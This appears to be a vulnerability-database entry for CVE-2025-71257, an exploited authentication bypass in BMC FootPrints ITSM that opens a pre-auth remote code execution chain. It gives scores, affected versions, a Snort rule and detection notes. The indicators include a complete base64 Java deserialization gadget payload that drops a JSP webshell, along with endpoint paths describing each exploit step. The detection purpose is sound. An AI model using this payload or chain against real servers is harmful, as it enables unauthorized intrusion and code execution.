cbcvebase.
CVE-2025-71257
published 2026-03-19

CVE-2025-71257: BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability due to improper enforcement of security filters on…

PriorityP189critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
4.40%
90.1th percentile
BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability due to improper enforcement of security filters on restricted REST API endpoints and servlets. Unauthenticated remote attackers can bypass access controls to invoke restricted functionality and gain unauthorized access to application data and modify system resources. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

Affected

2 ranges
VendorProductVersion rangeFixed in
bmcfootprints_itsm20.20.02 – 20.24.01.001
bmc_software_incfootprints20.20.02 – 20.24.01.001

Detection & IOCsextracted from sources · hover to see the quote

url/footprints/servicedesk/passwordreset/request/
cookieSEC_TOKEN=
path/footprints/servicedesk/externalfeed/RSS
path/footprints/servicedesk/import/searchWeb
path/footprints/servicedesk/aspnetconfig
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS BMC FootPrints SEC_TOKEN Extraction Authentication Bypass Attempted (CVE-2025-71257)"; flow:established,to_server; http.method; content:"GET"; http.uri; bsize:46; content:"/footprints/servicedesk/passwordreset/request/"; fast_pattern; reference:url,labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/; reference:cve,2025-71257; classtype:attempted-admin; sid:2068317; rev:1; metadata:affected_product BMC_FootPrints, attack_target Server, tls_state TLSDecrypt, created_at 2026_03_18, cve CVE_2025_71257, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2026_03_18, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAGndlYmFwcHMvUk9PVC93YXRjaFRvd3IuanNwc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHEAfgADeHB1cgACW0Ks8xf4BghU4AIAAHhwAAABvjwlQCBwYWdlIGxhbmd1YWdlPSJqYXZhIiBjb250ZW50VHlwZT0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04IiU+CjwlCiAgICBTdHJpbmcgb3NVc2VyID0gU3lzdGVtLmdldFByb3BlcnR5KCJ1c2VyLm5hbWUiKTsKICAgIFN0cmluZyBjd2QgPSBTeXN0ZW0uZ2V0UHJvcGVydHkoInVzZXIuZGlyIik7CiU+CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KPGhlYWQ+CiAgICA8dGl0bGU+d2F0Y2hUb3dyIFN5c3RlbSBJbmZvPC90aXRsZT4KPC9oZWFkPgo8Ym9keT4KICAgIDxoMT5TeXN0ZW0gSW5mb3JtYXRpb248L2gxPgogICAgPHA+PHN0cm9uZz5PUyBVc2VyOjwvc3Ryb25nPiA8JT0gb3NVc2VyICU+PC9wPgogICAgPHA+PHN0cm9uZz5DdXJyZW50IFdvcmtpbmcgRGlyZWN0b3J5Ojwvc3Ryb25nPiA8JT0gY3dkICU+PC9wPgo8L2JvZHk+CjwvaHRtbD4Kc3IAPm9yZy5hc3BlY3RqLndlYXZlci50b29scy5jYWNoZS5TaW1wbGVDYWNoZSRTdG9yZWFibGVDYWNoaW5nTWFwO6sCH0tqVloCAANKAApsYXN0U3RvcmVkSQAMc3RvcmluZ1RpbWVyTAAGZm9sZGVydAASTGphdmEvbGFuZy9TdHJpbmc7eHIAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4AAABmQ2q4P0AAAAMdAABLnh4
  • Detect auth bypass exploitation by monitoring for unauthenticated GET requests to the password reset endpoint that result in a Set-Cookie header containing 'SEC_TOKEN='. The URI length is exactly 46 bytes.
  • The auth bypass (CVE-2025-71257) is the first step in a pre-auth RCE chain: SEC_TOKEN cookie obtained from /passwordreset/request/ is then used to reach SSRF endpoints (CVE-2025-71258, CVE-2025-71259) and the deserialization RCE endpoint (CVE-2025-71260). Correlate these requests in sequence from the same source IP.
  • For the deserialization RCE stage, look for POST/GET requests to /footprints/servicedesk/aspnetconfig with a __VIEWSTATE parameter containing a base64-encoded Java serialized object (starts with 'rO0AB').
  • After successful deserialization exploitation, a JSP webshell is dropped at a randomized path under /webapps/ROOT/. Monitor for new .jsp file creation under the webapps/ROOT directory and subsequent HTTP 200 responses containing 'System Information', 'OS User:', and 'Current Working Directory:'.
  • SSRF exploitation (CVE-2025-71259) is detectable by monitoring GET requests to /footprints/servicedesk/externalfeed/RSS with an external or internal URL in the feedUrl parameter from unauthenticated sessions.
  • SSRF exploitation (CVE-2025-71258) is detectable by monitoring GET requests to /footprints/servicedesk/import/searchWeb with an external or internal URL in the url parameter from unauthenticated sessions.
  • ·The Snort/ET rule (sid:2068317) requires TLS decryption to be effective against HTTPS-protected FootPrints deployments, as indicated by the tls_state:TLSDecrypt metadata.
  • ·The deserialization payload (CVE-2025-71260) randomizes the embedded JSP filename at runtime to evade static filename-based detection; defenders should not rely solely on a fixed filename like 'watchTowr.jsp'.
  • ·The auth bypass yields a SEC_TOKEN cookie from the unauthenticated /passwordreset/request/ endpoint; this token is then reused to access restricted REST API endpoints and servlets, so token issuance from this endpoint to unauthenticated clients is itself the bypass indicator.

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.